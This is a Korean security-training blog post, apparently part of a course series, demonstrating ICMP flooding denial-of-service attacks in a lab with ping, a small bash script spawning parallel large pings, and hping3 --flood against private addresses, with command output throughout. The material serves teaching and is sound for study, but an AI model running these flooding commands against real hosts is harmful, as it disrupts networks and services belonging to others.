정보보안(구버전)/공격툴&정보수집 2016. 5. 24. 16:41
공격툴&정보수집 - 06. ICMP Flooding 공격 (DoS Attack)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
ICMP Flooding 공격
- ICMP 메세지를 시스템, 서버, 전송 장비에게 대량으로 전송하여 네트워크 및 시스템 부하를 발생시키는 공격이다.
Ex1) ICMP Flooding 공격 I
@ CentOS
- gnome-system-monitor 실행
[root@CentOS /root]# gnome-system-monitor &
@ Window2008
- CentOS으로 Ping 실시
C:\Users\Administrator>ping 192.168.20.200 -t -l 50000
Ping 192.168.20.200 50000바이트 데이터 사용:
192.168.20.200의 응답: 바이트=50000 시간=2ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=3ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=1ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=2ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=4ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=3ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=5ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=3ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=3ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=3ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=2ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=4ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=3ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=1ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=2ms TTL=64
192.168.20.200의 응답: 바이트=50000 시간=1ms TTL=64
192.168.20.200에 대한 Ping 통계:
패킷: 보냄 = 16, 받음 = 16, 손실 = 0 (0% 손실),
왕복 시간(밀리초):
최소 = 1ms, 최대 = 5ms, 평균 = 2ms
Control-C
^C
C:\Users\Administrator>
@ CentOS
- gnome-system-monitor 확인
Ex2) ICMP Flooding공격 II
@ Window2008
- 작업 관리자 실행 (VM -> Send Ctrl+Alt+Del -> 작업 관리자 시작 -> 네트워킹)
@ Kali Linux
- ICMP Flooding 공격 툴 제작
root@kali:~# mkdir /p /root/bin
root@kali:~# cd /root/bin
root@kali:~/bin#
root@kali:~/bin# vi ping.sh
#!/bin/bash
ping -s 62000 192.168.20.201 &
ping -s 62000 192.168.20.201 &
ping -s 62000 192.168.20.201 &
: wq! |
root@kali:~/bin# chmod 755 ping.sh
- Window2008로 Ping 실시
root@kali:~/bin# ./ping.sh 192.168.20.201
PING 192.168.20.201 (192.168.20.201) 62000(62028) bytes of data.
62008 bytes from 192.168.20.201: icmp_seq=1 ttl=128 time=11.4 ms
62008 bytes from 192.168.20.201: icmp_seq=2 ttl=128 time=6.06 ms
62008 bytes from 192.168.20.201: icmp_seq=3 ttl=128 time=9.93 ms
62008 bytes from 192.168.20.201: icmp_seq=4 ttl=128 time=15.5 ms
62008 bytes from 192.168.20.201: icmp_seq=5 ttl=128 time=10.1 ms
62008 bytes from 192.168.20.201: icmp_seq=6 ttl=128 time=9.89 ms
~ 중간 생략 ~
(ctrl+c)
root@kali:~/bin# pkill ping
root@kali:~/bin# rm ping.sh
@ Window2008
- 작업 관리자 네트워킹 확인
@ Kali Linux
- ICMP Flooding공격 툴 제작
root@kali:~/bin# vi ping.sh
#!/bin/bash
ping -s 62000 $1 &
ping -s 62000 $1 &
ping -s 62000 $1 &
: wq! |
root@kali:~/bin# chmod 755 ping.sh
- CentOS로 Ping 실시
root@kali:~/bin# ./ping.sh 192.168.20.200
PING 192.168.20.200 (192.168.20.200) 62000(62028) bytes of data.
62008 bytes from 192.168.20.200: icmp_seq=2 ttl=64 time=7.64 ms
62008 bytes from 192.168.20.200: icmp_seq=5 ttl=64 time=9.80 ms
62008 bytes from 192.168.20.200: icmp_seq=6 ttl=64 time=10.3 ms
62008 bytes from 192.168.20.200: icmp_seq=7 ttl=64 time=19.7 ms
62008 bytes from 192.168.20.200: icmp_seq=8 ttl=64 time=4.86 ms
62008 bytes from 192.168.20.200: icmp_seq=9 ttl=64 time=14.4 ms
62008 bytes from 192.168.20.200: icmp_seq=10 ttl=64 time=13.9 ms
PING 192.168.20.200 (192.168.20.200) 62000(62028) bytes of data.
62008 bytes from 192.168.20.200: icmp_seq=11 ttl=64 time=16.9 ms
62008 bytes from 192.168.20.200: icmp_seq=2 ttl=64 time=5.83 ms
~ 중간 생략 ~
(ctrl+c)
root@kali:~/bin# pkill ping
root@kali:~/bin# rm ping.sh
@ CentOS
- gnome-system-monitor 확인
Ex3) ICMP Flooding 공격 III
@ Kali Linux
- Window2008로 hping3 실시
-1 : icmp scan
--flood : flooding
-p : port number
-d : data size
root@kali:~/bin# hping3 -1 192.168.20.201 --flood -p 80 -d 62000
HPING 192.168.20.201 (eth1 192.168.20.201): icmp mode set, 28 headers + 62000 data bytes
hping in flood mode, no replies will be shown
~ 1분 정도 진행 실시 ~
(ctrl+c)
--- 192.168.20.201 hping statistic ---
48696 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
@ Window2008
- 작업 관리자 네트워킹 확인 및 재부팅 실시
@ Kali Linux
- CentOS로 hping3 실시
root@kali:~/bin# hping3 -1 192.168.20.200 --flood -p 80 -d 62000
HPING 192.168.20.200 (eth1 192.168.20.200): icmp mode set, 28 headers + 62000 data bytes
hping in flood mode, no replies will be shown
~ 1분 정도 진행 실시 ~
(ctrl+c)
--- 192.168.20.200 hping statistic ---
43946 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
@ CentOS
- gnome-system-monitor 확인
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
공격툴&정보수집 - 제6장 ICMP LAND 공격 (DoS Attack) https://youtu.be/OswrNPtE6T4
'정보보안(구버전) > 공격툴&정보수집' 카테고리의 다른 글
공격툴&정보수집 - 08. 로컬 시스템 부하 공격 (DoS Attack) (0) | 2016.05.25 |
---|---|
공격툴&정보수집 - 07. TCP Syn Flooding 공격 (DoS Attack) (0) | 2016.05.25 |
공격툴&정보수집 - 05. TCP & UDP 프로토콜 (0) | 2016.05.24 |
공격툴&정보수집 - 04. ICMP 프로토콜 & ICMP Flooding 공격 (0) | 2016.05.24 |
공격툴&정보수집 - 03. ARP 프로토콜 & ARP Spoofing 공격 (0) | 2016.05.23 |